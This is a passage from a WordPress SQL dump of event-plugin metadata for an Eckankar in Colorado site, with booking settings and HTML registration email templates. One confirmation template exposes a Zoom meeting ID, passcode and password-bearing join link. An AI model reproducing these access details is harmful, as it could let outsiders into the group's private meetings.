1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(181891,268422,'mec_tickets','a:0:{}'),(181892,268422,'mec_fees_global_inheritance','1'),(181893,268422,'mec_fees','a:0:{}'),(181894,268422,'mec_ticket_variations_global_inheritance','1'),(181895,268422,'mec_ticket_variations','a:0:{}'),(181896,268422,'mec_reg_fields_global_inheritance','1'),(181897,268422,'mec_reg_fields','a:0:{}'),(181898,268422,'mec_bfixed_fields','a:0:{}'),(181899,268422,'mec_op','a:0:{}'),(181900,268422,'mec_fields','a:0:{}'),(181901,268422,'mec_event_status','EventScheduled'),(181902,268422,'mec_moved_online_link',''),(181903,268422,'mec_cancelled_reason',''),(181904,268422,'mec_display_cancellation_reason_in_single_page',''),(181905,268422,'boldgrid_hide_page_title','0'),(181906,268422,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(181907,268422,'passster_activate_global_protection',NULL),(181908,268422,'passster_activate_protection',NULL),(181909,268422,'passster_protection_type','password'),(181910,268422,'boldgrid_in_page_containers','1'),(181911,268422,'passster_area_shortcode',''),(181912,268422,'_wp_old_date','2023-01-14'),(181913,268422,'_thumbnail_id','266189'),(181915,268422,'_dp_original','268420'),(181916,268422,'_edit_lock','1682294588:15'),(181917,268422,'_edit_last','15'),(181918,268423,'mec_color',''),(181919,268423,'mec_location_id','161'),(181920,268423,'mec_dont_show_map','0'),(181921,268423,'mec_organizer_id','1'),(181922,268423,'mec_read_more',''),(181923,268423,'mec_more_info',''),(181924,268423,'mec_more_info_title',''),(181925,268423,'mec_more_info_target','_self'),(181926,268423,'mec_cost',''),(181927,268423,'mec_currency','a:0:{}'),(181928,268423,'mec_additional_organizer_ids','a:0:{}'),(181929,268423,'mec_additional_location_ids','a:0:{}'),(181930,268423,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-05-28\";s:4:\"hour\";s:1:\"4\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-05-28\";s:4:\"hour\";s:1:\"5\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(181931,268423,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(181932,268423,'mec_certain_weekdays','a:0:{}'),(181933,268423,'mec_allday','0'),(181934,268423,'one_occurrence','0'),(181935,268423,'mec_hide_time','0'),(181936,268423,'mec_hide_end_time','0'),(181937,268423,'mec_comment',''),(181938,268423,'mec_timezone','global'),(181939,268423,'mec_countdown_method','global'),(181940,268423,'mec_public','1'),(181941,268423,'mec_start_date','2023-05-28'),(181942,268423,'mec_start_time_hour','4'),(181943,268423,'mec_start_time_minutes','0'),(181944,268423,'mec_start_time_ampm','PM'),(181945,268423,'mec_start_day_seconds','57600'),(181946,268423,'mec_end_date','2023-05-28'),(181947,268423,'mec_end_time_hour','5'),(181948,268423,'mec_end_time_minutes','30'),(181949,268423,'mec_end_time_ampm','PM'),(181950,268423,'mec_end_day_seconds','63000'),(181951,268423,'mec_repeat_status','0'),(181952,268423,'mec_repeat_type',''),(181953,268423,'mec_repeat_interval','1'),(181954,268423,'mec_repeat_end',''),(181955,268423,'mec_repeat_end_at_occurrences',''),(181956,268423,'mec_repeat_end_at_date',''),(181957,268423,'mec_advanced_days','a:0:{}'),(181958,268423,'mec_in_days',''),(181959,268423,'mec_not_in_days',''),(181960,268423,'mec_hourly_schedules','a:0:{}'),(181961,268423,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"1\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(181962,268423,'mec_tickets','a:0:{}'),(181963,268423,'mec_fees_global_inheritance','1'),(181964,268423,'mec_fees','a:0:{}'),(181965,268423,'mec_ticket_variations_global_inheritance','1'),(181966,268423,'mec_ticket_variations','a:0:{}'),(181967,268423,'mec_reg_fields_global_inheritance','1'),(181968,268423,'mec_reg_fields','a:0:{}'),(181969,268423,'mec_bfixed_fields','a:0:{}'),(181970,268423,'mec_op','a:0:{}'),(181971,268423,'mec_fields','a:0:{}'),(181972,268423,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6143:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b>891 2510 3432<br />\r\n<b>Passcode:</b> 162109</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09\">https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:9944:\"<!-- [if !mso]><!--><!--<![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n\r\n      <xml>\r\n        <o:OfficeDocumentSettings>\r\n          <o:AllowPNG/>\r\n          <o:PixelsPerInch>96</o:PixelsPerInch>\r\n        </o:OfficeDocumentSettings>\r\n      </xml>\r\n      <![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n  \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<style type=\"text/css\">\r\n    body {width: 600px;margin: 0 auto;}\r\n    table {border-collapse: collapse;}\r\n    table, td {mso-table-lspace: 0pt;mso-table-rspace: 0pt;}\r\n    img {-ms-interpolation-mode: bicubic;}\r\n  </style>\r\n<![endif]-->\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>\r\n<style type=\"text/css\">\r\n    body, p, div {\r\n      font-family: inherit;\r\n      font-size: 14px;\r\n    }\r\n    body {\r\n      color: #000000;\r\n    }\r\n    body a {\r\n      color: #1188E6;\r\n      text-decoration: none;\r\n    }\r\n    p { margin: 0; padding: 0; }\r\n    table.wrapper {\r\n      width:100% !important;\r\n      table-layout: fixed;\r\n      -webkit-font-smoothing: antialiased;\r\n      -webkit-text-size-adjust: 100%;\r\n      -moz-text-size-adjust: 100%;\r\n      -ms-text-size-adjust: 100%;\r\n    }\r\n    img.max-width {\r\n      max-width: 100% !important;\r\n    }\r\n    .column.of-2 {\r\n      width: 50%;\r\n    }\r\n    .column.of-3 {\r\n      width: 33.333%;\r\n    }\r\n    .column.of-4 {\r\n      width: 25%;\r\n    }\r\n    ul ul ul ul  {\r\n      list-style-type: disc !important;\r\n    }\r\n    ol ol {\r\n      list-style-type: lower-roman !important;\r\n    }\r\n    ol ol ol {\r\n      list-style-type: lower-latin !important;\r\n    }\r\n    ol ol ol ol {\r\n      list-style-type: decimal !important;\r\n    }\r\n    @media screen and (max-width:480px) {\r\n      .preheader .rightColumnContent,\r\n      .footer .rightColumnContent {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent div,\r\n      .preheader .rightColumnContent span,\r\n      .footer .rightColumnContent div,\r\n      .footer .rightColumnContent span {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent,\r\n      .preheader .leftColumnContent {\r\n        font-size: 80% !important;\r\n        padding: 5px 0;\r\n      }\r\n      table.wrapper-mobile {\r\n        width: 100% !important;\r\n        table-layout: fixed;\r\n      }\r\n      img.max-width {\r\n        height: auto !important;\r\n        max-width: 100% !important;\r\n      }\r\n      a.bulletproof-button {\r\n        display: block !important;\r\n        width: auto !important;\r\n        font-size: 80%;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n      }\r\n      .columns {\r\n        width: 100% !important;\r\n      }\r\n      .column {\r\n        display: block !important;\r\n        width: 100% !important;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n        margin-left: 0 !important;\r\n        margin-right: 0 !important;\r\n      }\r\n      .social-icon-column {\r\n        display: inline-block !important;\r\n      }\r\n    }\r\n  </style>\r\n</p>\r\n<p>\r\n<style>\r\nbody {font-family: \'Muli\', sans-serif;}\r\n</style>\r\n</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<!--user entered Head Start--><!--End Head user entered--><center class=\"wrapper\" data-link-color=\"#1188E6\" data-body-style=\"font-size:14px; font-family:inherit; color:#000000; background-color:#FFFFFF;\">\r\n<div class=\"webkit\">\r\n<table class=\"wrapper\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" bgcolor=\"#FFFFFF\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"outer\" role=\"content-container\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td width=\"100%\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><!-- [if mso]>\r\n    <center>\r\n    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<table>\r\n<tr>\r\n<td width=\"600\">\r\n  <![endif]-->\r\n<table style=\"width: 100%; max-width: 600px;\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px 0px 0px 0px; color: #000000; text-align: left;\" role=\"modules-container\" align=\"left\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"module preheader preheader-hide\" style=\"display: none !important; mso-hide: all; visibility: hidden; opacity: 0; color: transparent; height: 0; width: 0;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"preheader\">\r\n<tbody>\r\n<tr>\r\n<td role=\"module-content\">\r\n<p>&nbsp;</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"padding: 30px 20px 30px 20px;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" bgcolor=\"#f6f6f6\" data-type=\"columns\" data-distribution=\"1\">\r\n<tbody>\r\n<tr role=\"module-content\">\r\n<td valign=\"top\" height=\"100%\">\r\n<table class=\"column column-0\" style=\"width: 540px; border-spacing: 0; border-collapse: collapse; margin: 0px 10px 0px 10px;\" border=\"0\" width=\"540\" cellspacing=\"0\" cellpadding=\"0\" align=\"left\" bgcolor=\"\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px; margin: 0px; border-spacing: 0;\">\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"6c9e9414-eb30-47e2-97d8-7bd6a4df5990\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 10px 0px; line-height: 24px; text-align: inherit;\" role=\"module-content\" valign=\"top\" bgcolor=\"\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"948e3f3f-5214-4721-a90e-625a47b1c957\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 30px 18px 30px; line-height: 26px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a10dcb57-ad22-4f4d-b765-1d427dfddb4e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 30px 18px 30px; line-height: 22px; text-align: inherit; background-color: #ffffff;\" role=\"module-content\" valign=\"top\" bgcolor=\"#ffffff\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<p>&nbsp;</p>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a4e5faa9-7044-47fd-a4a1-b7a1746c258e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 18px 5px; line-height: 22px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a265ebb9-ab9c-43e8-9009-54d6151b1600\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 8px 30px 40px 28px; line-height: 22px; text-align: inherit; background-color: #6e6e6e;\" role=\"module-content\" valign=\"top\" bgcolor=\"#6e6e6e\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"></div>\r\n<figure style=\"text-align: center;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px;\">© Eckankar In Colorado -2022</span></figure>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<!-- [if mso]>\r\n                                  </td>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                                </tr>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                              </table>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                            </center>\r\n                            <![endif]--></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</center>\";}}'),(181973,268423,'mec_event_status','EventScheduled'),(181974,268423,'mec_moved_online_link',''),(181975,268423,'mec_cancelled_reason',''),(181976,268423,'mec_display_cancellation_reason_in_single_page',''),(181977,268423,'protect_children',''),(181978,268423,'passster_activate_global_protection',NULL),(181979,268423,'passster_activate_protection',NULL),(181980,268423,'passster_protection_type','password'),(181981,268423,'boldgrid_hide_page_title','0'),(181982,268423,'_thumbnail_id','267574'),(181983,268423,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(181984,268423,'boldgrid_in_page_containers','1'),(181987,268423,'_dp_original','268413'),(181986,268423,'passster_area_shortcode',''),(181988,268423,'_edit_lock','1682294827:15'),(181989,268423,'_edit_last','15'),(181990,268421,'_edit_lock','1682306160:2'),(181991,268421,'passster_area_shortcode',''),(181992,268425,'mec_color',''),(181993,268425,'mec_location_id','118'),(181994,268425,'mec_dont_show_map','0'),(181995,268425,'mec_organizer_id','1'),(181996,268425,'mec_read_more',''),(181997,268425,'mec_more_info',''),(181998,268425,'mec_more_info_title',''),(181999,268425,'mec_more_info_target','_self'),(182000,268425,'mec_cost',''),(182001,268425,'mec_currency','a:0:{}'),(182002,268425,'mec_additional_organizer_ids','a:0:{}'),(182003,268425,'mec_additional_location_ids','a:0:{}'),(182004,268425,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-04-30\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-04-30\";s:4:\"hour\";s:2:\"12\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(182005,268425,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(182006,268425,'mec_certain_weekdays','a:0:{}'),(182007,268425,'mec_allday','0'),(182008,268425,'one_occurrence','0'),(182009,268425,'mec_hide_time','0'),(182010,268425,'mec_hide_end_time','0'),(182011,268425,'mec_comment',''),(182012,268425,'mec_timezone','global'),(182013,268425,'mec_countdown_method','global'),(182014,268425,'mec_public','1'),(182015,268425,'mec_start_date','2023-04-30'),(182016,268425,'mec_start_time_hour','10'),(182017,268425,'mec_start_time_minutes','30'),(182018,268425,'mec_start_time_ampm','AM'),(182019,268425,'mec_start_day_seconds','37800'),(182020,268425,'mec_end_date','2023-04-30'),(182021,268425,'mec_end_time_hour','12'),(182022,268425,'mec_end_time_minutes','0'),(182023,268425,'mec_end_time_ampm','PM'),(182024,268425,'mec_end_day_seconds','43200'),(182025,268425,'mec_repeat_status','0'),(182026,268425,'mec_repeat_type',''),(182027,268425,'mec_repeat_interval','1'),(182028,268425,'mec_repeat_end',''),(182029,268425,'mec_repeat_end_at_occurrences','9'),(182030,268425,'mec_repeat_end_at_date',''),(182031,268425,'mec_advanced_days','a:0:{}'),(182032,268425,'mec_in_days',''),(182033,268425,'mec_not_in_days',''),(182034,268425,'mec_hourly_schedules','a:0:{}'),(182035,268425,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_fo